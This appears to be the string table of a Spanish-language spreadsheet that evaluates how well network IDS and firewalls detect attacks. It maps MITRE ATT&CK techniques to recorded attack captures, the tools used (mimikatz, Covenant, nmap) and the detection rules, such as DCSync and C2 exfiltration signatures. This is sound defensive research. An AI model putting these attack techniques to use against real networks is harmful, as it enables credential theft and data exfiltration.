    <t>T1113</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>TA0003 - TA0001</t>
  </si>
  <si>
    <t>Persistence - Initial Access</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>TA0003</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>6</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Software Extensions</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Browser Session Hijacking</t>
  </si>
  <si>
    <t>TA0001</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>TA0005 - TA0003 - TA0011</t>
  </si>
  <si>
    <t>Defense Evasion - Persistence - Command and Control</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>System Script Proxy Execution</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>Browser Information Discovery</t>
  </si>
  <si>
    <t>14</t>
  </si>
  <si>
    <t>Remote Access Tools</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain or Tenant Policy Modification</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>TA0040</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>TA0005 - TA0007</t>
  </si>
  <si>
    <t>Defense Evasion - Discovery</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Internal Image</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>TA0004 - TA0003</t>
  </si>
  <si>
    <t>Privilege Escalation - Persistence</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>TA0004 - TA0005</t>
  </si>
  <si>
    <t>Privilege Escalation - Defense Evasion</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>TA0005 - TA0008</t>
  </si>
  <si>
    <t>Defense Evasion - Lateral Movement</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Host Software Binary</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>TA0006 - TA0005 - TA0003</t>
  </si>
  <si>
    <t>Credential Access - Defense Evasion - Persistence</t>
  </si>
  <si>
    <t>9</t>
  </si>
  <si>
    <t>TA0006 - TA0009</t>
  </si>
  <si>
    <t>Credential Access - Collection</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>TA0003 - TA0004 - TA0005</t>
  </si>
  <si>
    <t>Persistence - Privilege Escalation - Defense Evasion</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>TA0042</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>TA0043</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>Deploy Container</t>
  </si>
  <si>
    <t>TA0005 - TA0002</t>
  </si>
  <si>
    <t>Defense Evasion - Execution</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t>T1619</t>
  </si>
  <si>
    <t>Cloud Storage Object Discovery</t>
  </si>
  <si>
    <t>T1620</t>
  </si>
  <si>
    <t>Reflective Code Loading</t>
  </si>
  <si>
    <t>T1621</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Request Generation</t>
  </si>
  <si>
    <t>T1622</t>
  </si>
  <si>
    <t>Debugger Evasion</t>
  </si>
  <si>
    <t>T1647</t>
  </si>
  <si>
    <t>Plist File Modification</t>
  </si>
  <si>
    <t>T1648</t>
  </si>
  <si>
    <t>Serverless Execution</t>
  </si>
  <si>
    <t>T1649</t>
  </si>
  <si>
    <t>Steal or Forge Authentication Certificates</t>
  </si>
  <si>
    <t>T1650</t>
  </si>
  <si>
    <t>Acquire Access</t>
  </si>
  <si>
    <t>T1651</t>
  </si>
  <si>
    <t>Cloud Administration Command</t>
  </si>
  <si>
    <t>T1652</t>
  </si>
  <si>
    <t>Device Driver Discovery</t>
  </si>
  <si>
    <t>T1653</t>
  </si>
  <si>
    <t>Power Settings</t>
  </si>
  <si>
    <t>T1654</t>
  </si>
  <si>
    <t>Log Enumeration</t>
  </si>
  <si>
    <t>T1656</t>
  </si>
  <si>
    <t>Impersonation</t>
  </si>
  <si>
    <t>T1657</t>
  </si>
  <si>
    <t>Financial Theft</t>
  </si>
  <si>
    <t>TA0001 - TA0011</t>
  </si>
  <si>
    <t>Initial Access - Command and Control</t>
  </si>
  <si>
    <t>T1666</t>
  </si>
  <si>
    <t>Modify Cloud Resource Hierarchy</t>
  </si>
  <si>
    <t>Email Bombing</t>
  </si>
  <si>
    <t>T1668</t>
  </si>
  <si>
    <t>Exclusive Control</t>
  </si>
  <si>
    <t>Wi-Fi Networks</t>
  </si>
  <si>
    <t>T1671</t>
  </si>
  <si>
    <t>Cloud Application Integration</t>
  </si>
  <si>
    <t>T1672</t>
  </si>
  <si>
    <t>Email Spoofing</t>
  </si>
  <si>
    <t>T1673</t>
  </si>
  <si>
    <t>Virtual Machine Discovery</t>
  </si>
  <si>
    <t>T1674</t>
  </si>
  <si>
    <t>Input Injection</t>
  </si>
  <si>
    <t>T1675</t>
  </si>
  <si>
    <t>ESXi Administration Command</t>
  </si>
  <si>
    <t>T1203-Botnet</t>
  </si>
  <si>
    <t>%Flows_TN</t>
  </si>
  <si>
    <t>TPR</t>
  </si>
  <si>
    <t>FPR</t>
  </si>
  <si>
    <t>GM</t>
  </si>
  <si>
    <t>Metric</t>
  </si>
  <si>
    <r>
      <t>Proporción de TP correctamente clasificados (Si TP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>↑ =&gt; R↑)</t>
    </r>
  </si>
  <si>
    <r>
      <t>Proporción de alarmas correctas  (Si FP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>↓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> =&gt; P↑)</t>
    </r>
  </si>
  <si>
    <t>Relación entre alarmas erróneas (P) y detecciones perdidas (R). Útil en clasificaciones muy desbalanceadas.</t>
  </si>
  <si>
    <t>GM (Geometric Mean):</t>
  </si>
  <si>
    <t>Equilibrio en FP y TP</t>
  </si>
  <si>
    <t>Proporción de FP correctamente clasificados</t>
  </si>
  <si>
    <t xml:space="preserve">R = TPR = TP / (Total ataques) </t>
  </si>
  <si>
    <t>= TP / (TP + FN)</t>
  </si>
  <si>
    <t>P = TP / (Total alarmas)</t>
  </si>
  <si>
    <t>= TP / (TP + FP)</t>
  </si>
  <si>
    <t xml:space="preserve">F1 </t>
  </si>
  <si>
    <t>= 2 * (P * R) / (P + R)</t>
  </si>
  <si>
    <t>Ataques</t>
  </si>
  <si>
    <t>Legítimo</t>
  </si>
  <si>
    <t>Tráfico total</t>
  </si>
  <si>
    <t>Sobre Tráfico</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>FPR = FP / (Total legítimo)</t>
  </si>
  <si>
    <t>= FP / (TN + FP)</t>
  </si>
  <si>
    <t>Métricas de Rendimiento:</t>
  </si>
  <si>
    <t>F1-Score (media armónica):</t>
  </si>
  <si>
    <t>TNR (Especificidad):</t>
  </si>
  <si>
    <t>TNR =</t>
  </si>
  <si>
    <t>= 1 - FPR = TN / (TN + FP)</t>
  </si>
  <si>
    <t xml:space="preserve"> = √(TPR * (1 - FPR))</t>
  </si>
  <si>
    <t>Ataques
(TP, FN)</t>
  </si>
  <si>
    <t>Legítimo
(FP, TN)</t>
  </si>
  <si>
    <t>* Cálculo por flujos</t>
  </si>
  <si>
    <t>Recall (Sensibilidad) o True Positive Rate (TPR)
(Detecciones correctas / Objetos reales)*</t>
  </si>
  <si>
    <t>FPR (False Positive Rate)*:</t>
  </si>
  <si>
    <t>Precisión (Detecciones correctas / Total de detecciones)*:</t>
  </si>
  <si>
    <t>Óptimo: Altos</t>
  </si>
  <si>
    <t>11</t>
  </si>
  <si>
    <t>MITRE 17.1</t>
  </si>
  <si>
    <t>Técnica MITRE y Características del ataque</t>
  </si>
  <si>
    <t>Otras Características del ataque</t>
  </si>
  <si>
    <t>Documentación</t>
  </si>
  <si>
    <t>Análisis Manual</t>
  </si>
  <si>
    <t>FG</t>
  </si>
  <si>
    <t>PA</t>
  </si>
  <si>
    <t>TÁCTICA</t>
  </si>
  <si>
    <t>OTRAS TÁCTICAS</t>
  </si>
  <si>
    <t>ID TÁCTICA</t>
  </si>
  <si>
    <t>TÉCNICA</t>
  </si>
  <si>
    <t>Nº Técnica detectable en Red</t>
  </si>
  <si>
    <t>ID TÉCNICA</t>
  </si>
  <si>
    <t>SUBTÉCNICA</t>
  </si>
  <si>
    <t>ID SUBTÉCNICA</t>
  </si>
  <si>
    <t>ATAQUE</t>
  </si>
  <si>
    <t>PROTOCOLO BASE DE ATAQUE</t>
  </si>
  <si>
    <t>HERRAMIENTA</t>
  </si>
  <si>
    <t>FICHERO PCAP - OLD</t>
  </si>
  <si>
    <t>pcap (Nuevo Nombre)</t>
  </si>
  <si>
    <t>TÉCNICA Detectable por Red
MITRE v15</t>
  </si>
  <si>
    <t>TÉCNICA Detectable por Red
MITRE v16.1</t>
  </si>
  <si>
    <t>TÉCNICA Detectable por Red
MITRE v17.1</t>
  </si>
  <si>
    <t>SUBTÉCNICA  Detectable por Red
MITRE v15</t>
  </si>
  <si>
    <t>SUBTÉCNICA  Detectable por Red
MITRE v16.1</t>
  </si>
  <si>
    <t>SUBTÉCNICA  Detectable por Red
MITRE v17.1</t>
  </si>
  <si>
    <t>DETECTABILIDAD  por IDS L3 (Red)</t>
  </si>
  <si>
    <t>NIVEL DE RED DE LA VICTIMA DEL ATAQUE (MODELO OSI)</t>
  </si>
  <si>
    <t>DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>MECANISMO DE DETECCIÓN</t>
  </si>
  <si>
    <t>DETECTABLE POR FLUJOS O POR PAQUETES (DPI): Flujos/DPI/Ambos/Cualquiera</t>
  </si>
  <si>
    <t>DETECTABLE POR FLUJOS O POR PAQUETES (DPI): Motivo</t>
  </si>
  <si>
    <t>DETALLES DE IMPLEMENTACIÓN DE ATAQUE</t>
  </si>
  <si>
    <t>NIVEL DE ATAQUE (Contexto de Ataque)</t>
  </si>
  <si>
    <t>JUSTIFICACIÓN NIVEL DE ATAQUE
(Contexto de Ataque)</t>
  </si>
  <si>
    <t>ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>VERIFICACIÓN MTU MÁXIMA</t>
  </si>
  <si>
    <t>#FLUJOS</t>
  </si>
  <si>
    <t>#Intentos Flujo (SYN)</t>
  </si>
  <si>
    <t>#FLUJOS CON ATAQUE/S PRINCIPAL/ES</t>
  </si>
  <si>
    <t>#FLUJOS CON ATAQUE/S COLATERAL/ES</t>
  </si>
  <si>
    <t>#FLUJOS ATAQUE (TOTAL)</t>
  </si>
  <si>
    <t>ATAQUE/S COLATERAL/ES - EXPLICACIÓN</t>
  </si>
  <si>
    <t>#MENSAJES DE RED CON ATAQUE/S</t>
  </si>
  <si>
    <t>#INSTANCIAS ATAQUE PRINCIPALES</t>
  </si>
  <si>
    <t>#INSTANCIAS ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>#INSTANCIAS ATAQUE TOTALES</t>
  </si>
  <si>
    <t>COMENTARIOS DE LAS DETECCIONES SNORT</t>
  </si>
  <si>
    <t>#Alertas</t>
  </si>
  <si>
    <t>#Alertas/SID</t>
  </si>
  <si>
    <t>#SID</t>
  </si>
  <si>
    <t>SIDs
(sin repetición)</t>
  </si>
  <si>
    <t>#Flujos con Ataques detectados (con SID)</t>
  </si>
  <si>
    <t>#Alertas/attackid</t>
  </si>
  <si>
    <t>#Attackid</t>
  </si>
  <si>
    <t>#AppID</t>
  </si>
  <si>
    <t>#Flujos FG</t>
  </si>
  <si>
    <t>#Flujos con Ataques detectados (attackid)</t>
  </si>
  <si>
    <t>#Flujos con Ataques detectados (AppID)</t>
  </si>
  <si>
    <t>Comentarios detecciones</t>
  </si>
  <si>
    <t>#Alertas/threat_id</t>
  </si>
  <si>
    <t>#threat_id</t>
  </si>
  <si>
    <t>#Flujos PA</t>
  </si>
  <si>
    <t>#Flujos con Ataques detectados (threatid)</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Inserción de información confidencial en una imagen JPG</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>Covenant, SSH, scp, Powershell</t>
  </si>
  <si>
    <t>T1001.002-Data_obfuscation_steganography_[4].pcapng</t>
  </si>
  <si>
    <t>SI</t>
  </si>
  <si>
    <t>L3</t>
  </si>
  <si>
    <t>✘</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías y/o estegoanálisis, envío de imágenes o ficheros con formato poco común entre equipos, existencia de ficheros comprimidos sospechosos, etc. </t>
  </si>
  <si>
    <t>DPI</t>
  </si>
  <si>
    <t>La detección requiere analizar el contenido de los archivos transmitidos, ya que los flujos no revelan esteganografía.</t>
  </si>
  <si>
    <t>LV1</t>
  </si>
  <si>
    <t>El uso de técnicas esteganográficas para ocultar datos es unívoca. No puede confundirse con actividad legítima</t>
  </si>
  <si>
    <t>Manual [4] /  3.18</t>
  </si>
  <si>
    <t>Manual [4] / B.18</t>
  </si>
  <si>
    <t>Manual [4] / 4.18</t>
  </si>
  <si>
    <t>✔</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Falsificación de protocolos de conexión segura como SSL o TLS</t>
  </si>
  <si>
    <t>TLS</t>
  </si>
  <si>
    <t>FakeTLS (raykaryshyn Github)</t>
  </si>
  <si>
    <t>T1001.003-Data_obfuscation_protocol_impersonation_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que analice el contenido y la estructura de los paquetes enviados para detectar una falsificación de protocolo. Adicionalmente se puede detectar con una regla personalizada que compruebe el campo Server Name y mediante DNS asegure si se corresponde con la dirección IP a la que se está accediendo.</t>
  </si>
  <si>
    <t>Solo mediante DPI puede observarse la manipulación de los campos del protocolo TLS; los flujos no ofrecen esta visibilidad.</t>
  </si>
  <si>
    <t>La falsificación del protocolo TLS para acceder al equipo víctima es únivoca. No puede confundirse con actividad legítima.</t>
  </si>
  <si>
    <t>Manual [4] /  3.17</t>
  </si>
  <si>
    <t>Manual [4] / B.17</t>
  </si>
  <si>
    <t>Manual [4] / 4.17</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>Obtención de credenciales del usuario krbtgt (Usuario Kerberos Active Directory)</t>
  </si>
  <si>
    <t>DCERPC</t>
  </si>
  <si>
    <t>mimikazt</t>
  </si>
  <si>
    <t>T1003-Os_credential_dumping_dcsync_[4].pcapng</t>
  </si>
  <si>
    <t>Regla compuesta que detecte una llamada DCERPC Bind a la API DRSUAPI seguida de una llamada a la función DsGetNCChanges</t>
  </si>
  <si>
    <t>Las llamadas específicas a funciones del protocolo DCERPC son visibles Ãºnicamente con inspección profunda de los paquetes.</t>
  </si>
  <si>
    <t>La obtención de credenciales del usuario krbtgt de manera no autorizada supone siempre un ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.11</t>
  </si>
  <si>
    <t>Manual [4] / B.11</t>
  </si>
  <si>
    <t>Manual [4] / 4.11</t>
  </si>
  <si>
    <t>Traspaso de canal primario C2 a canal alternativo</t>
  </si>
  <si>
    <t>SMB2</t>
  </si>
  <si>
    <t>Covenant</t>
  </si>
  <si>
    <t>T1008-Fallback_channels_[4].pcapng</t>
  </si>
  <si>
    <t>SI*</t>
  </si>
  <si>
    <t>La detección de la creación del canal es posible para este caso concreto, en el que el cortafuegos detecta la creación de ambos canales. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el cortafuegos.</t>
  </si>
  <si>
    <t>Ambos</t>
  </si>
  <si>
    <t>La creación de un canal secundario puede verse en los flujos, pero detectar el cambio activo entre canales requiere DPI también.</t>
  </si>
  <si>
    <t>La creación de un canal secundario de C&amp;C siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.19</t>
  </si>
  <si>
    <t>Manual [4] / B.19</t>
  </si>
  <si>
    <t>Manual [4] / 4.19</t>
  </si>
  <si>
    <t>Establecimiento del canal C&amp;C primario mediante Covenant - Command and Control</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y puertos</t>
  </si>
  <si>
    <t>TCP</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>T1018-service_discovery_[3].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío de mútliples peticiones a un rango de puertos en un tiempo determinado</t>
  </si>
  <si>
    <t>Flujos</t>
  </si>
  <si>
    <t>La naturaleza de los escaneos de puertos es detectable por el patrón de conexiones, visible en flujos.</t>
  </si>
  <si>
    <t>El descubrimiento de servicios, de forma general, se califica como ataque</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.1</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.1.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.1.5</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Ejecución de script en Python para activar el reenvío de paquetes en el equipo víctima</t>
  </si>
  <si>
    <t>SSH, Scapy</t>
  </si>
  <si>
    <t>T1020.001-Automated_exfiltration_traffic_duplication_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red que detecte el envío duplicado de paquetes procedentes de un mismo origen interno a la organización</t>
  </si>
  <si>
    <t>La duplicación de tráfico produce patrones redundantes fáciles de identificar por flujo, sin inspección de contenido.</t>
  </si>
  <si>
    <t>La ejecución de un script que habilite el reenvío de paquetes en el equipo víctima es un ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.24</t>
  </si>
  <si>
    <t>Manual [4] / B.24</t>
  </si>
  <si>
    <t>Manual [4] / 4.24</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>Sesión SSH</t>
  </si>
  <si>
    <t>T1021-remote_services_ssh_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica para detectar conexiones SSH entre un orígen y un servidor o destino dentro de la red a proteger.                                                               *Este ataque, si bien es detectable por red, es idéntico a un acceso legítimo, por lo que no es posible diferenciar uno de otro (salvo por anomalías relacionadas con direcciones IP o usuarios poco comunes)</t>
  </si>
  <si>
    <t>Las conexiones SSH son cifradas; aunque los flujos muestran el tráfico, no se puede inspeccionar su contenido con DPI.</t>
  </si>
  <si>
    <t>LV2</t>
  </si>
  <si>
    <t>El uso de SSH es genérico, no siempre tiene que tratarse de un ataque</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.10</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.10.4</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.48</t>
  </si>
  <si>
    <t>Comunicación C2 para el establecimiento de extracción programada</t>
  </si>
  <si>
    <t>HTTP</t>
  </si>
  <si>
    <t>Covenant, Powershell</t>
  </si>
  <si>
    <t>T1029-Scheduled_transfer_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, basada en el descubrimiento de eventos programados que no han sido creados por el usuario.</t>
  </si>
  <si>
    <t>Los patrones de eventos programados pueden deducirse del flujo, pero confirmar contenido exfiltrado exige DPI.</t>
  </si>
  <si>
    <t>La programación de una exfiltración de datos es siempre un ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.25</t>
  </si>
  <si>
    <t>Manual [4] / B.25</t>
  </si>
  <si>
    <t>Manual [4] / 4.25</t>
  </si>
  <si>
    <t>Establecimiento del canal C&amp;C para la programación de la transferencia - Command and Control</t>
  </si>
  <si>
    <t>Dividir archivos para realizar transferencias menores a un umbral que provoque alertas</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>ftp, split</t>
  </si>
  <si>
    <t>T1030-Transfer_Size_Limits_[5].pcapng</t>
  </si>
  <si>
    <t>NO***</t>
  </si>
  <si>
    <t>Solo con reglas específicas configuradas para detectar transferencia de fragmentos secuenciales por FTP u otros medios. Dependiendo de la forma en la que se envien los archivos, puede ser indetectable. Sin embargo, si utiliza protocolos de transferencia de ficheros (FTP,SMB...) resulta importante monitorizar transferencias con un mismo tamaño de manera concurrente</t>
  </si>
  <si>
    <t>Cualquiera</t>
  </si>
  <si>
    <t>Tanto los flujos (por patrón de tamaño y frecuencia) como el DPI (por contenido) pueden detectar esta técnica (cualquiera sirve).</t>
  </si>
  <si>
    <t>Transferencia de ficheros mediante FTP, previamente divididos en paquetes de un tamaño constante</t>
  </si>
  <si>
    <t>La división en partes para la transferencia de un fichero no necesariamente es un ataque</t>
  </si>
  <si>
    <t>Manual [5] /  4.9.1</t>
  </si>
  <si>
    <t>Manual [5] / C.1</t>
  </si>
  <si>
    <t>Manual [5] /  5.12.5</t>
  </si>
  <si>
    <t>En el proceso de ataque se hace uso de un Shell Remoto, pero no es la función principal</t>
  </si>
  <si>
    <t>System Owner</t>
  </si>
  <si>
    <t>Descubrimiento de sesión de usuario en equipo remoto</t>
  </si>
  <si>
    <t>quser, qwinsta</t>
  </si>
  <si>
    <t>T1033-System_owner_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte múltiples interacciones con la API LSM_API_service del servicio RPC desde el mismo equipo origen.</t>
  </si>
  <si>
    <t>La interacción con servicios remotos se detecta por flujos anómalos hacia servicios de sesión (ej. LSM API).</t>
  </si>
  <si>
    <t>El descubrimiento de sesión del usuario en un equipo remoto puede tratarse de una actividad legítima en ciertos contextos</t>
  </si>
  <si>
    <t>Manual [4] /  3.12</t>
  </si>
  <si>
    <t>Manual [4] / B.12</t>
  </si>
  <si>
    <t>Manual [4] / 4.12</t>
  </si>
  <si>
    <t>Descarga de archivos de interés disponibles en una red compartida</t>
  </si>
  <si>
    <t>Comando Net Use</t>
  </si>
  <si>
    <t>T1039-Data_from_network_shared_drive_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, copia repentina de ficheros compartidos por red.</t>
  </si>
  <si>
    <t>Copia repentina desde recursos compartidos puede reflejarse en volÃºmenes de flujo atípicos.</t>
  </si>
  <si>
    <t>La extracción de datos de un disco compartido es legítimo en según qué contextos</t>
  </si>
  <si>
    <t>Manual [4] /  3.15</t>
  </si>
  <si>
    <t>Manual [4] / B.15</t>
  </si>
  <si>
    <t>Manual [4] / 4.15</t>
  </si>
  <si>
    <t>Exfiltración por canal C2</t>
  </si>
  <si>
    <t>Caldera</t>
  </si>
  <si>
    <t>T1041-exfiltration_over_c2_channel_[3].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en la sospecha de una extracción de información confidencial por un posible canal C2</t>
  </si>
  <si>
    <t>Se requiere análisis del patrón de transferencia (flujo) y contenido transmitido para confirmar exfiltración (ambos).</t>
  </si>
  <si>
    <t>La exfiltración de datos por un canal C2 siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.14</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.14.4</t>
  </si>
  <si>
